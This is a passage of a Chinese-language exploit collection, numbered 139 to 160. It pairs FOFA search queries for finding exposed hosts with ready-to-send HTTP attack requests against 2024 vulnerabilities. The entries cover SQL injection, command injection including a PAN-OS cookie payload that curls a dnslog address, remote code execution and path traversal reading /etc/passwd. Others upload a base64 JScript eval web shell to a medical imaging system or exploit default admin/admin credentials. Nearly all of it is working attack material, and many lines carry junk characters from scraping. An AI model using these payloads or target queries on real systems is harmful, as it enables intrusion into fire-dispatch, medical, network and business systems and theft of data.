GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1! a2 K- O' \5 j2 f6 d# g* C9 U
Host: x.x.x.x
  k& j- z. [4 c$ C9 R3 o% N  aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 n% F' I# o9 y% Z. y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  k/ V; Q3 h+ q5 c- L! i* D. z: rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) l2 b/ d$ o7 T0 M* h% |, `0 mAccept-Encoding: gzip, deflate, br8 n4 L# z3 G1 R6 h
Connection: close" W7 ^( L4 L: k! f
Upgrade-Insecure-Requests: 1/ _' \, ~* {; \
' m' D1 r( z& {, b0 K) u

) y( b4 a9 u+ j6 S8 Z  K139. 福建科立讯通信指挥调度平台editemedia.php sql注入
3 Z% J- b: |) _& k  FCVE-2024-2622! r3 D4 A/ ?% u* r1 X; I! |" y- @
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" \( n9 w+ e$ ~( w. p; q1 c9 D6 K
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1* u% }6 ~) d! q- b7 V+ |9 E
Host: x.x.x.x/ K! a8 R5 A7 I" J( c) K0 m3 C4 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 c( G* R4 L* g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  @- C6 C, \# i( B# k7 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* c3 G  |; @8 D! ^) o0 [Accept-Encoding: gzip, deflate, br* H3 K- |# R0 I
Connection: close
; r4 I. t( }0 C* v0 R( ECookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk& a+ ^0 z  K) T( N  {2 l/ u& _
Upgrade-Insecure-Requests: 1
! [7 i5 s: ]( X3 G0 C
& c' y% N0 I5 {2 R% ?5 T2 s" @" H- O. u: i4 E# v3 u
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入0 L! ~. J, b1 Y" n- V, e  u6 x3 N
CVE-2024-2566; G# O* t0 z4 T% ^9 _
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
) I9 K7 T5 Y1 [" l; }% yGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.19 j0 s2 ?+ h# Z: i. U3 Z, _+ J
Host: x.x.x.x
8 L! q: e3 }2 a! b% G6 v& C  y7 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* V, n" v2 F5 \& H# C2 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" f9 X+ `* x. t+ ]( C- Z) x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 z, a' u' w: `$ g' T9 I* g, I
Accept-Encoding: gzip, deflate, br
4 }$ a# f8 C5 x. OConnection: close/ |' a% M2 g" N8 Y0 [: F7 G
Cookie: authcode=h8g9
0 e) P9 ?5 r+ i- @4 \) b. bUpgrade-Insecure-Requests: 1
  Q7 C! _8 j6 d% B& A
1 d* ]& G8 u4 C" [) n2 d8 Z5 p+ m. G
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入; n6 O9 d: W: I+ s2 R2 l; |
FOFA:body="指挥调度管理平台"" p$ z1 X" W( u1 B2 w: h
POST /app/ext/ajax_users.php HTTP/1.1
+ R7 [5 y$ U! R3 AHost: your-ip; \3 b# S  a! ?  }$ T
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info: C  w9 t$ t3 j8 H' Y# i
Content-Type: application/x-www-form-urlencoded9 ]: k: @8 _) z

  w) n3 q+ l0 t% \$ M" e2 t: u
. q% X. `1 e! s) n. [) m  rdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -3 V8 L1 f4 T! @$ g" t: T, h2 }. \' j
. `: ?# ?2 W2 j4 F" u2 |5 ~

1 e, c8 ], z- E3 Z* o2 G142. CMSV6车辆监控平台系统中存在弱密码+ J" D' [; S% V' _: r" T5 M9 k
CVE-2024-29666
3 W9 Z- d  ?, g' EFOFA:body="/808gps/"! @. B3 r/ m! S8 r4 k& l
admin/admin
* `: ]) q- z8 s143. Netis WF2780 v2.1.40144 远程命令执行
. ]( \7 j$ e  `% z/ Y, sCVE-2024-25850# C% w1 b7 x& N& E
FOFA:title='AP setup' && header='netis'
0 h7 c1 N9 L  w+ Y# w/ KPAYLOAD/ u! W; ?) {6 c
7 p0 b% }9 K1 B5 x1 S
144. D-Link nas_sharing.cgi 命令注入
: Z$ S$ ?2 r3 |5 i8 OFOFA:app="D_Link-DNS-ShareCenter"
* l+ Q( d+ X" M" Q) `. t5 {system参数用于传要执行的命令
; ^. |8 s+ @+ s, B5 k, k3 C' jGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
& T% x/ D5 g+ T$ ]  y& sHost: x.x.x.x
/ o7 J" }- W* V/ Q- o8 D0 mUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
' N& `  J" Z4 m* v- E7 M' ?# RConnection: close
% H# r  _+ S6 J# fAccept: */*$ e5 Z# y) v- c9 y! {; @& M! o
Accept-Language: en
& g/ e; p2 w  n% x' LAccept-Encoding: gzip- @# W1 q1 S- T) _8 m

: a+ G6 [, }- \1 k
" \4 Z  a  U) L+ J1 s145. Palo Alto Networks PAN-OS GlobalProtect 命令注入/ A$ i. v7 l. S' ^
CVE-2024-3400
) m4 E' t) c3 ^0 k* ^1 A  G% vFOFA:icon_hash="-631559155"  M. j# @. z' \. z
GET /global-protect/login.esp HTTP/1.1
- Z! d  p! ]* O, m% h, W" ^  eHost: 192.168.30.112:1005
6 C! M' q1 a$ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84( }  X5 G/ J  z, i
Connection: close4 e$ {. r* F* d5 A
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;$ G! Q' \9 Y" f5 C3 z' W
Accept-Encoding: gzip8 D8 e" W& X$ h0 c5 M

* P# k! `2 {2 d- p
/ S( r. X  h% {6 P* m% g: }+ `146. MajorDoMo thumb.php 未授权远程代码执行
% r* _* d% ~- S$ jCNVD-2024-02175
3 b4 n) M0 p3 [; n) E) lFOFA:app="MajordomoSL"
; _7 p0 G3 L2 e' b1 ]GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
" \5 z& q5 H* x* _: ^Host: x.x.x.x
) M9 }8 S7 [$ N( RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' c' `4 L$ n5 z5 e) Y
Accept-Charset: utf-80 B. v# n# r7 t
Accept-Encoding: gzip, deflate0 {; J: K( G( f( U
Connection: close" u& Q) b1 X1 p) k  V& A7 o

3 l: N" f. Y+ C6 ~' t0 v+ r; t9 E. Z: J5 J- Y! l/ Y% h
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历; y% o; |( j( N! R; Y
CVE-2024-32399
% {  l( |" N1 _; U6 gFOFA:body="RaidenMAILD"$ I9 N' {! f6 a  B. C
GET /webeditor/../../../windows/win.ini HTTP/1.19 n4 ^. X4 U" B9 U4 l7 Y( r' ^( C
Host: 127.0.0.1:81
  h, [  N# t: K1 p2 A* rCache-Control: max-age=0# T3 d4 W' X& D7 o3 v) J
Connection: close
/ m0 o* l6 O5 a# r9 A9 q  b
+ V) y3 M& Q5 ~: Y2 Q0 _" S9 R, i" k( ~$ m8 S
148. CrushFTP 认证绕过模板注入) R3 ?4 ~% y7 V9 t
CVE-2024-4040
" B7 y) e0 {( R& N! A3 uFOFA:body="CrushFTP"( W$ Y/ N$ t, u! V  H2 j
PAYLOAD
! {: O" C) P: {/ @  Q
2 b* s6 z: T- G9 ]149. AJ-Report开源数据大屏存在远程命令执行
% e  K6 B6 Z3 B% FFOFA:title="AJ-Report"8 @! h- a" c  ^& d6 t$ ^& F

" v: U9 F* I/ @5 t* yPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
7 a* @( k8 x# \* J; @* s/ s$ ?- `Host: x.x.x.x6 b' t4 e. e. }; {: f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 U1 U$ O8 ~, [. T' HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  i5 m/ O% X) S: v0 r2 fAccept-Encoding: gzip, deflate, br
$ ?+ m% W8 i* B  s- N1 [8 HAccept-Language: zh-CN,zh;q=0.9( C1 U8 @; z' Z% g! u
Content-Type: application/json;charset=UTF-8
- K" ?% g6 \4 m6 oConnection: close
, z. T# X1 w( N
( D$ P, M% r, s7 ^5 L3 _& L{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
: [1 m' \6 ]4 b7 x# i) [6 p
3 b1 L- S  _& ~4 h' i& N' N150. AJ-Report 1.4.0 认证绕过与远程代码执行8 Y# ?$ A8 m6 j8 z3 {
FOFA:title="AJ-Report"* M7 c0 Z9 A+ v/ w& r5 @
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
- \3 K4 t8 `  LHost: x.x.x.x
2 c% U& i3 C& L! {" C% J+ d0 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 m9 U1 S! `3 z' O5 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 `/ o' c5 z5 W3 I% ^Accept-Encoding: gzip, deflate, br; ^+ I1 \: b) U: b" S; o( O
Accept-Language: zh-CN,zh;q=0.93 D& {5 h* V2 H
Content-Type: application/json;charset=UTF-8
7 K5 x6 ]5 _' _8 JConnection: close2 D; L7 B' g& u. ]
Content-Length: 339
% m% `* V& I( h2 i* L6 m4 z3 |0 t6 }# G. W, B5 B
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}+ ]2 K' J9 I1 d, T

" I6 p( Y) X- B7 t. G% b3 Z+ e$ _, l0 g6 k! U0 m" E; `
151. AJ-Report 1.4.1 pageList sql注入1 {- \6 j; J2 e
FOFA:title="AJ-Report"0 G+ W, O; j' s3 b$ c- h# j
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
7 L$ z$ y3 u7 `- o: S; R# s0 bHost: x.x.x.x7 T# \5 z  [1 J; O: ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 A/ K1 j& T# B1 TConnection: close( {% ^. e3 I# o2 C$ Y2 z
Accept-Encoding: gzip
* W! W- Y2 ?/ z: c, ^6 o8 `% G2 R3 Z
# R3 W% U4 l! C" ?- l' U5 y' d7 z) b7 ]1 ^& C: C6 K6 P/ M
152. Progress Kemp LoadMaster 远程命令执行
, C: `& k( u3 g0 S+ [CVE-2024-12122 D6 N) s3 r1 M+ g9 t) n  {
LoadMaster <= 7.2.59.2 (GA)5 [1 t1 X% a( w" T7 w
LoadMaster<=7.2.54.8 (LTSF)& K6 K3 ]6 a# A) m0 l, r
LoadMaster <= 7.2.48.10 (LTS)5 V, ~2 Z! l0 Z3 J
FOFA:body="LoadMaster"
! e2 R8 N/ R7 T5 G4 F$ i1 V9 MJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
, Z; l6 c: t$ M3 }5 sGET /access/set?param=enableapi&value=1 HTTP/1.1
+ M8 @( I' J4 @" o+ F3 V, oHost: x.x.x.x
0 B, D4 N, j2 i$ o( y6 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1# ^% H2 T4 C# J. X* q5 K
Connection: close
6 {* |5 m" G8 G% d5 h7 }4 HAccept: */*
7 _9 f; K0 A$ I0 DAccept-Language: en
+ d2 }7 ~! m, B# |4 I; rAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
0 H6 G+ L2 n+ U+ J2 d, A/ Y& _Accept-Encoding: gzip$ H& p5 C; [/ m4 s2 v1 z
# A4 t3 N' ~, o# M3 b  D! U: Q
6 S) x4 [* l) |7 S7 V
153. gradio任意文件读取" |: @1 S  b4 P) ~( A- q4 O
CVE-2024-1561FOFA:body="__gradio_mode__"
. |" ]+ c# {. |$ C! K% I$ H. N第一步,请求/config文件获取componets的id0 c+ \8 P% b: v; o  c: y5 o' Y
http://x.x.x.x/config% w# v4 M6 p+ A9 H) d6 D- Q" w

( D2 c/ [9 _. v- w: I/ K9 m
$ z4 ?- [3 m6 l' K4 M0 t$ M/ H( @# P0 b第二步,将/etc/passwd的内容写入到一个临时文件
7 d4 |) A4 O2 Z4 F  I. N& _& sPOST /component_server HTTP/1.1
) Q' L0 [/ _( z0 m* w3 ]4 t4 WHost: x.x.x.x1 D. M5 x  K, ^2 c) T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
, e9 P1 G+ e- O3 F, U. z; `! }Connection: close
4 h: s. E  X" V' |+ \) H2 l; MContent-Length: 1154 Q& I3 |5 L- z8 {9 ?+ y' p+ n
Content-Type: application/json
* J! E$ U! t( G. U2 GAccept-Encoding: gzip( X* E, l4 Z' ~" X. e6 `9 f

+ z6 B& E6 z4 p# Z- i/ H{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
6 S8 M1 Y3 U7 h
2 X& \+ e& H! I5 q8 R3 ]" R5 e2 o: p9 @3 R  B
第三步访问& G) g9 v  G0 c5 n' s- \/ [
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
1 B' H& X2 Q8 d. {9 [! i! r7 c/ h8 x9 n! R) V# s

4 c. r6 c: A2 m, w  z154. 天维尔消防救援作战调度平台 SQL注入. U# p7 U/ n  W! i4 G! |' h2 E
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"% Y5 S! ~% y  k- Z. ~) ?
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
- k. q9 @2 V: IHost: x.x.x.x
: k' G1 d5 O* ~" h6 JContent-Length: 106/ A5 ^$ J4 T7 b3 p; |' P
Cache-Control: max-age=0
0 N8 z! U! z! ]. h" ~# HUpgrade-Insecure-Requests: 1
% L+ p4 |/ C7 ~3 b1 G2 YOrigin: http://x.x.x.x& C2 b$ S8 T# F, W4 L
Content-Type: application/json
6 P  R5 u! c* r" p- s, t# AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.367 `9 _3 p9 U" ]; v0 D9 `& p3 @: S* ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 w2 [7 z, b& _Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page/ h' s! e% |' n  Q
Accept-Encoding: gzip, deflate0 j: |" |" f/ ~* B$ _- q& f
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
1 h& l  ~' ^8 ^- o* kConnection: close- r- e) P/ `" Q4 r# z2 c$ X. g
  @  B9 e9 [1 C
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}5 E/ \4 S+ G8 n. T! f

) c" r% `( Q: f+ b) ~, e! l. r" u3 C: @  a
155. 六零导航页 file.php 任意文件上传
8 H0 P4 f3 J! v: e: h. ^CVE-2024-34982
, ?$ d: B1 _( Q( |! T; D5 Z% p9 EFOFA:title=="上网导航 - LyLme Spage"9 r) I$ I/ {3 g
POST /include/file.php HTTP/1.1
. c# c$ Q4 Q- g# Q, E4 m% LHost: x.x.x.x6 |# b/ X) z: |+ N! ]( ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.09 O  }: B5 L8 o" `4 b& f! J
Connection: close
' N# _; H2 O- D, X, \1 X( }Content-Length: 232
' a" w8 L4 f# ]% y: mAccept: application/json, text/javascript, */*; q=0.01* l. V' N$ J6 o2 H: H' X) ^
Accept-Encoding: gzip, deflate, br; Q: F* @' T: X- g# a% }- B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 P' ^- I/ Q3 c2 i: f% VContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
7 \: `/ U2 ?* O  p9 k# E1 WX-Requested-With: XMLHttpRequest
$ {0 w) [; c" @! G
3 R0 j6 W1 h( O0 J-----------------------------qttl7vemrsold314zg0f
" c7 e$ T7 l" J2 F, c5 [  gContent-Disposition: form-data; name="file"; filename="test.php"# ^/ O- Z4 C1 h; q  k( G
Content-Type: image/png6 I& t0 ]! F' K' K
! K- }) Q( P+ U2 @+ n. S
<?php phpinfo();unlink(__FILE__);?>+ W8 }- H0 W+ K, I9 B; }. {1 n* m
-----------------------------qttl7vemrsold314zg0f--4 E6 {" w. ?6 a+ r8 w/ ?! \4 k

, i+ Z, V' }! Z; }  }& |9 J+ }+ s. T& c. e5 A) a* }
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php, |: _1 W/ o9 y
& z, a) X! F6 o# L
156. TBK DVR-4104/DVR-4216 操作系统命令注入! A% }4 X/ y7 ~" b  b( [. n7 m& y/ x
CVE-2024-3721
" S5 U/ c4 d; J/ c+ v8 oFOFA:"Location: /login.rsp"
$ T. `. ~7 e! _0 o: L·TBK DVR-41046 \5 S. u6 z$ s% `! ~( ~* z) p
·TBK DVR-4216
% Q5 h" ~% _8 r4 |( acurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1". [+ a0 v5 A4 J$ M6 N

$ K4 S4 Q; L7 s9 V# e! d3 Q) F9 @; r3 F
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1& r" A  F6 a- q" s: n: M
Host: x.x.x.x# S( T- b$ W& [$ d2 A
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% z5 ^2 u% e1 ~6 h& X
Connection: close% b6 x: z% q7 n7 `: _6 K9 Q
Content-Length: 0# R0 N" L+ X, U0 P
Cookie: uid=18 L( q+ x6 Y. y, E( j0 b9 @
Accept-Encoding: gzip
, U9 q7 j/ N  N  l9 E* p& {3 q4 a: K) E& e" r2 {/ h% R2 s% t, z

9 ^2 ~, L% ~  u3 y- x$ o: t$ f  t157. 美特CRM upload.jsp 任意文件上传$ ]" [7 z  E4 p1 y
CNVD-2023-06971
4 I5 r! x8 U: Y& z5 Z1 E- dFOFA:body="/common/scripts/basic.js"
1 E0 b- ^& ]; R+ h" w/ G! ]2 d/ \POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1& o) t! s5 m% S# z4 ?( e3 d
Host: x.x.x.x
$ @( b+ T( `9 ?+ C4 R3 f- e9 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.369 d, t; y- L6 v/ [$ D
Content-Length: 709/ p. l$ U% |! w! P: T; ?% P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& c8 p- P' y7 F: k/ e+ K
Accept-Encoding: gzip, deflate/ O; i, m" q/ g0 ~5 r; Z3 v$ N1 b
Accept-Language: zh-CN,zh;q=0.92 L8 C/ a  @% q! N* x
Cache-Control: max-age=0
% D# i, `) ]. E. `, E. b- }* KConnection: close
; B- \0 t! h9 N& v2 \8 @" R8 u( n/ XContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
/ r; M, c2 W( ~* X* rUpgrade-Insecure-Requests: 10 X; L# ~5 s4 N( i' }
! W, x4 _4 W& \8 T" d* G# Z6 k
------WebKitFormBoundary1imovELzPsfzp5dN
4 R% ]  {0 }% d& W) G' j& ^0 H) GContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
; I* D! G! f% ?Content-Type: application/octet-stream
7 G/ l9 g$ D- T$ ~( X7 Z* U! E& ^' O% d
nyhelxrutzwhrsvsrafb
: r! O7 ]8 H, n& q1 E9 J------WebKitFormBoundary1imovELzPsfzp5dN
4 h8 x; S6 f' H7 hContent-Disposition: form-data; name="key"  z6 |; B# S" M+ b
. U' _) c4 c2 m  `
null! B/ L2 u# w& [0 w+ C  R- E' k+ H
------WebKitFormBoundary1imovELzPsfzp5dN
; w+ |$ b* k8 I0 c; g* M% f% nContent-Disposition: form-data; name="form"2 M: E  [$ r8 r) ]" M

/ F; ^! x  y; s2 Q0 O. j6 X) g8 v7 enull4 }# b; s& y; x, H% f
------WebKitFormBoundary1imovELzPsfzp5dN
; |* C' x, W, w& XContent-Disposition: form-data; name="field"
9 T- Y0 X5 o% m1 v0 F( o! K: i9 h$ m
null  n- x; r# b" b6 q$ Q, @. n! K
------WebKitFormBoundary1imovELzPsfzp5dN3 O. ?; u+ a3 e% X/ o9 r' c
Content-Disposition: form-data; name="filetitile"
' S. {* ^7 B4 k( C8 D% o! N. y6 j9 R4 k
null# V: h) m- N( w, G! e0 H% k
------WebKitFormBoundary1imovELzPsfzp5dN2 R& O8 s3 I) e# }* r5 G! o
Content-Disposition: form-data; name="filefolder"+ s& {' H# b2 i' f& f/ A* L, D4 T
) t" m; b6 T" T8 M0 z
null7 r2 z$ W' C, A1 h* Z
------WebKitFormBoundary1imovELzPsfzp5dN--
8 B/ i8 f5 `: _/ Z6 y" H1 W! b) V# m, _' _
% k% z4 g: ~" O5 ]
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
" h  ~1 J4 ^1 N) K; \9 Z- D
% S7 i/ s2 d; o158. Mura-CMS-processAsyncObject存在SQL注入8 P, s; `* N- c
CVE-2024-32640
% D5 i; f2 O  T2 X  x  l: U+ i7 @FOFA:"Generator: Masa CMS"% l6 Y: X9 @9 p. O- A
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1, {: _* C6 Z4 @+ C& E5 r
Host: {{Hostname}}
3 C" J; \! q* K! Q0 Q3 ^3 `& rContent-Type: application/x-www-form-urlencoded
2 G" L' o. X" e( }6 x( _) V) Q. Z4 b) D
object=displayregion&contenthistid=x\'&previewid=1
( t1 e) v! k2 m3 Q- O# l" \$ W! R2 n" o

. P$ n- I( C$ V7 v6 F159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
8 o' g# p$ B* Y4 ^FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
' ?2 k. F8 y4 y8 tPOST /webservices/WebJobUpload.asmx HTTP/1.1
& g, j- o5 T4 ?( L) T3 M: e* ?Host: x.x.x.x
4 W6 y0 ]( @7 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
) @$ y& T# H3 O& x4 \! zContent-Length: 1080, L0 Y! }/ f/ ]+ [+ s* c
Accept-Encoding: gzip, deflate# A% Q7 [: e& |
Connection: close
8 s0 D7 N$ K9 ^4 @( \9 lContent-Type: text/xml; charset=utf-80 w6 v- l) {; E1 G
Soapaction: "http://rainier/jobUpload"$ b! p2 ~& L; ?0 s

. Z+ K# g- g$ V/ ^<?xml version="1.0" encoding="utf-8"?>1 n" E. r. V6 h
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
: e7 L( t# C( h2 X" f<soap:Body>  G( M- _  ?" r1 s
<jobUpload xmlns="http://rainier">5 B- C6 D0 @: F, I% ?( j
<vcode>1</vcode>& p% n9 `2 I* }5 D
<subFolder></subFolder>
  |' F  T' W1 W% w* t9 F* }9 f" x- y<fileName>abcrce.asmx</fileName>+ j+ f) S, B/ p5 K) L# u2 B* n
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
' M4 R1 L2 g/ s3 K# y- C</jobUpload>
# m& f, s9 V+ \( W4 L2 W" G" |0 V* `( z</soap:Body>
3 [% S" y8 I! y! {$ o5 N& R</soap:Envelope>
/ T3 A" M/ {( i/ ]+ D4 X
5 c8 F" K  i- W' f  `; D
- v9 }. ?, u. b) v9 n: C) d; n/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")) f4 X  g; E: R, ~

% e' b7 M2 Q$ @5 G) c8 l# t- p% A5 S, p( O, ]1 y/ D& _% X
160. Sonatype Nexus Repository 3目录遍历与文件读取" I6 `7 a5 [! `! |& b7 P' |
CVE-2024-4956
6 z: @& s8 k0 i+ Q* c! F6 RFOFA:title="Nexus Repository Manager"
8 G/ @9 e8 b- @6 e9 \& q" N: x7 FGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1. z5 [1 L- I, P( Z  g
Host: x.x.x.x
9 p) Q% g  E. z$ a/ e, m( P' pUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.02 \+ M$ W! \5 I, i3 {& D- s
Connection: close1 f( h+ I  g& n& T* Z' Z
Accept: */*
" y9 C% g5 y4 [& P( r3 N3 dAccept-Language: en5 }, v; g/ c- E3 f4 o, x; u
Accept-Encoding: gzip
* m. O5 x6 a5 Z5 C+ k6 f
